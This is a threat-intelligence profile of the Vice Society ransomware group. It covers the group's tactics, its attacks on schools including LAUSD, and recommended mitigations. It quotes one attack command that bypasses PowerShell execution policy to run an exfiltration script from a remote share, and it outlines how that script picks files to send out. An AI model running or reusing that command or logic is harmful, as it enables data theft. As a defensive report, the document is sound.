Vice Society (also known as Vice Spider, DEV-0832, and Vanilla Tempest) is identified as a Russian-based group specializing in intrusion, exfiltration, and extortion. Operating since the summer of 2021, Vice Society sets itself apart from other ransomware groups by deviating from the typical ransomware-as-a-service (RaaS) model. Instead of developing their own custom ransomware payload, they rely on modified versions of existing ransomware families available for sale on dark web marketplaces. Specifically, Vice Society has been observed using forks of ransomware strains such as HelloKitty (also known as FiveHands) and Zeppelin in their attack chain. This approach differentiates them from groups like LockBit, which follow the RaaS model. While many ransomware groups have transitioned to using randomly generated file extensions, DEV-0832 has incorporated branding in their Vice Society variant, using file extensions such as .v-s0ciety or .v-society. In late September 2022, DEV-0832 introduced another variant called RedAlert, which uses the .locked file extension as part of its ransomware payload.
This financially motivated group occasionally avoids deploying ransomware and opts for extortion using stolen data. In 2022, Vice Society was recognized as one of the most impactful ransomware gangs. This cybercrime group significantly focused on targeting educational institutions, surpassing other ransomware families such as LockBit, BlackCat, BianLian, and Hive. Cybersecurity researchers found Vice Society also targeted prominent industry sectors, including healthcare, governments, manufacturing, retail, and legal services. Vice Society has targeted victims across continents, spanning North America, South America, and Europe, in addition to their technically unremarkable attacks.
DEV-0832 utilizes various methods to gain access to victims’ systems. These threat actors initially breach networks relying on well-known techniques like phishing, compromised credentials, known security vulnerabilities, or even obtaining initial access from criminal actors referred to as “initial access” brokers. Once they infiltrate a network, Vice Society employs automated scripts and leverages the organization’s network management tools to conduct reconnaissance and extract data. Subsequently, the group deploys the prepackaged ransomware to carry out their malicious activities. The group has been observed employing various tools such as PowerShell Empire, SystemBC, and Cobalt Strike for lateral movement purposes. Based on incident response efforts in 2021, Vice Society typically remains in the victims’ environments for around six days. The initial ransom demands can exceed $1 million, but negotiations often lead to a reduction of about 60%, settling at around $460,000. Vice Society takes extensive steps to prevent organizations from recovering without paying the ransom. Some observations indicate that DEV-0832 has accessed two domain administrator accounts and reset passwords for over 150,000 users. This action effectively locks out legitimate users and hampers remediation efforts, including attempts to prevent the deployment of ransomware or conduct post-compromise incident response.
Discovered in early 2023, the Vice Society ransomware gang attacked the Los Angeles Unified School District (LAUSD), the second-largest school district in the United States. As a result of this attack, files containing the personal information of contractors, including Social Security Numbers (SSNs), were stolen. LAUSD discovered that the threat actors had access to their network for over two months, from July 31, 2022, to September 3, 2022. The stolen data included payroll records and labor-related documents containing SSNs, names, and home addresses of contractor and subcontractor employees. LAUSD confirmed that Vice Society had published the stolen data on their leak site. Despite the ransom demands, LAUSD refused to pay, prioritizing the allocation of resources for students’ education. The FBI, CISA, and MS-ISAC issued a joint advisory highlighting the Vice Society’s disproportionate targeting of the U.S. education sector, which includes LAUSD. Vice Society has also claimed attacks on other educational institutions globally, including Cincinnati State Technical and Community College and the University of Duisburg-Essen. LAUSD serves over 640,000 kindergarten through 12th-grade students across Los Angeles and surrounding areas.
Most recently, cybersecurity researchers found that the Vice Society ransomware gang utilized a custom-built Microsoft PowerShell (PS) script to exfiltrate data from a victim network. This data exfiltration method involves using PowerShell scripts as a built-in data exfiltration technique, which helps threat actors evade detection by security software and detection mechanisms. The script, named w1.ps1, was recovered from the Windows Event Log (WEL) and was found to be executed using a specific PowerShell command, “powershell.exe -ExecutionPolicy Bypass -file \\[redacted_ip]\s$\w1.ps1”. The script is designed to automatically choose and copy data from the network without requiring any arguments. The script identifies mounted drives on the system and recursively searches through root directories, enabling data exfiltration via HTTP. It employs exclusion criteria to filter out system files, backups, web browser-related folders, and certain security solutions. The script showcases a high level of coding expertise and highlights the persistent threat of double extortion in ransomware. This finding emphasizes the importance of organizations prioritizing strong security measures and remaining vigilant against evolving threats. While the script is efficient in terms of resource consumption, its specific criteria mean that it will only exfiltrate files over 10 KB with specific file extensions and within designated directories.
To mitigate the impact of Vice Society, consider implementing the following measures:
- Conduct device discovery to increase network visibility.
- Utilize vulnerability management tools for updates.
- Employ firewalls and intrusion prevention devices.
- Enable cloud-delivered protection in your antivirus solution.
- Activate tamper protection features.
- Run endpoint detection and response in block mode.
- Enable automated investigation and remediation.
- Implement strong credential hygiene practices.
- Apply attack surface reduction rules to prevent common infection vectors.
- Enable PowerShell Module and Script Block Logging in PowerShell.
Additionally, monitoring the presence of the PowerShell command mentioned earlier is recommended. These measures will enhance your defenses and reduce the impact of the threat.